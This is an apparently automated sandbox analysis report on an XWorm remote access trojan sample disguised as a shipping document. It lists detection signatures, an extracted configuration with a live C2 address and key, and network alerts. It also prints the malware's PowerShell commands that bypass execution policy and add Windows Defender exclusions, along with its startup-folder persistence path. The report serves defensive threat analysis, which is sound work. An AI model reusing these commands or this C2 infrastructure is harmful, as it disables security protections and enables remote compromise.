Edit tour

Windows Analysis Report
PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe

Overview

General Information

Sample name:	PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe renamed because original name is a hash value
Original sample name:	PACKIING- - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe
Analysis ID:	1542954
MD5:	632f722953592e348c533977a5f251d7
SHA1:	d4e62b7060f00888d43eb1fbb0d0f8f5fbd8ef4d
SHA256:	4978a378806fd5d68c08ad4602f80d3f5f1f870cb072475bd32b7a8ca32a3d88
Tags:	AsyncRATexeuser-threatcat_ch
Infos:

Detection

XWorm

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected XWorm

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Bypasses PowerShell execution policy

C2 URLs / IPs found in malware configuration

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sample uses string decryption to hide its real strings

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to call native functions

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates processes with suspicious names

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: Powershell Defender Exclusion

Sigma detected: Startup Folder File Write

Stores files to the Windows start menu directory

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe (PID: 1988 cmdline: "C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe" MD5: 632F722953592E348C533977A5F251D7)

PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe (PID: 6592 cmdline: "C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe" MD5: 632F722953592E348C533977A5F251D7)

powershell.exe (PID: 3228 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 1532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 1412 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 1772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 3292 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 1272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 5388 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 1576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
XWorm	Malware with wide range of capabilities ranging from RAT to ransomware.	No Attribution	https://any.run/cybersecurity-blog/xworm-malware-communication-analysis/ https://any.run/cybersecurity-blog/xworm-technical-analysis-of-a-new-malware-version/ https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/ https://cert.pl/en/posts/2023/10/deworming-the-xworm/ https://embee-research.ghost.io/infrastructure-analysis-with-dns-pivoting/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["104.250.180.178"], "Port": "7061", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.2"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000003.00000002.4520296085.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000003.00000002.4520296085.0000000000402000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xcb33:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xcbd0:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xcce5:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xc14d:$cnc4: POST / HTTP/1.1
00000000.00000002.2052801609.0000000003541000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000000.00000002.2052801609.0000000003541000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x13d17:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x225fb:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x31573:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x13db4:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x22698:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x31610:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x13ec9:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x227ad:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x31725:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x13331:$cnc4: POST / HTTP/1.1 0x21c15:$cnc4: POST / HTTP/1.1 0x30b8d:$cnc4: POST / HTTP/1.1
Process Memory Space: PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe PID: 1988	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Process Memory Space: PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe PID: 1988	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe PID: 6592	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Click to see the 2 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.3547fe4.1.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.3547fe4.1.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xaf33:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xafd0:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xb0e5:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xa54d:$cnc4: POST / HTTP/1.1
3.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.400000.0.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
3.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.400000.0.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xcd33:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xcdd0:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xcee5:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xc34d:$cnc4: POST / HTTP/1.1
0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.35568c8.0.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.35568c8.0.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xaf33:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xafd0:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xb0e5:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xa54d:$cnc4: POST / HTTP/1.1
0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.35568c8.0.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.35568c8.0.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xcd33:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x1bcab:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xcdd0:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x1bd48:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xcee5:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x1be5d:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xc34d:$cnc4: POST / HTTP/1.1 0x1b2c5:$cnc4: POST / HTTP/1.1
0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.3547fe4.1.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.3547fe4.1.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xcd33:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x1b617:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x2a58f:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xcdd0:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x1b6b4:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x2a62c:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xcee5:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x1b7c9:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x2a741:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xc34d:$cnc4: POST / HTTP/1.1 0x1ac31:$cnc4: POST / HTTP/1.1 0x29ba9:$cnc4: POST / HTTP/1.1
Click to see the 5 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe", ParentImage: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe, ParentProcessId: 6592, ParentProcessName: PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe', ProcessId: 3228, ProcessName: powershell.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe", ParentImage: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe, ParentProcessId: 6592, ParentProcessName: PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe', ProcessId: 3228, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Startup Folder File Write

Source: File created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe, ProcessId: 6592, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe", ParentImage: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe, ParentProcessId: 6592, ParentProcessName: PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe', ProcessId: 3228, ProcessName: powershell.exe

Suricata Signatures

ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-27T00:29:25.629966+0200	2853193	1	Malware Command and Control Activity Detected	192.168.2.5	50000	104.250.180.178	7061	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000000.00000002.2052801609.0000000003541000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Xworm {"C2 url": ["104.250.180.178"], "Port": "7061", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.2"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\XClient.exe

ReversingLabs: Detection: 68%

Multi AV Scanner detection for submitted file

Source: PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe

ReversingLabs: Detection: 68%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\XClient.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.3547fe4.1.raw.unpack	String decryptor: 104.250.180.178
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.3547fe4.1.raw.unpack	String decryptor: 7061
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.3547fe4.1.raw.unpack	String decryptor: <123456789>
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.3547fe4.1.raw.unpack	String decryptor: <Xwormmm>
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.3547fe4.1.raw.unpack	String decryptor: XWorm V5.2
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.3547fe4.1.raw.unpack	String decryptor: USB.exe
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.3547fe4.1.raw.unpack	String decryptor: %AppData%
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.3547fe4.1.raw.unpack	String decryptor: XClient.exe

Source: PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: zOCS.pdbSHA256 source: PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe, XClient.exe.3.dr
Source:	Binary string: zOCS.pdb source: PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe, XClient.exe.3.dr

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.5:50004 -> 104.250.180.178:7061
Source: Network traffic	Suricata IDS: 2853193 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.5:50000 -> 104.250.180.178:7061

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: 104.250.180.178

Source: global traffic

TCP traffic: 192.168.2.5:49771 -> 104.250.180.178:7061

Source: Joe Sandbox View

IP Address: 104.250.180.178 104.250.180.178

Source: Joe Sandbox View

ASN Name: M247GB M247GB

Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178
Source: unknown	TCP traffic detected without corresponding DNS query: 104.250.180.178

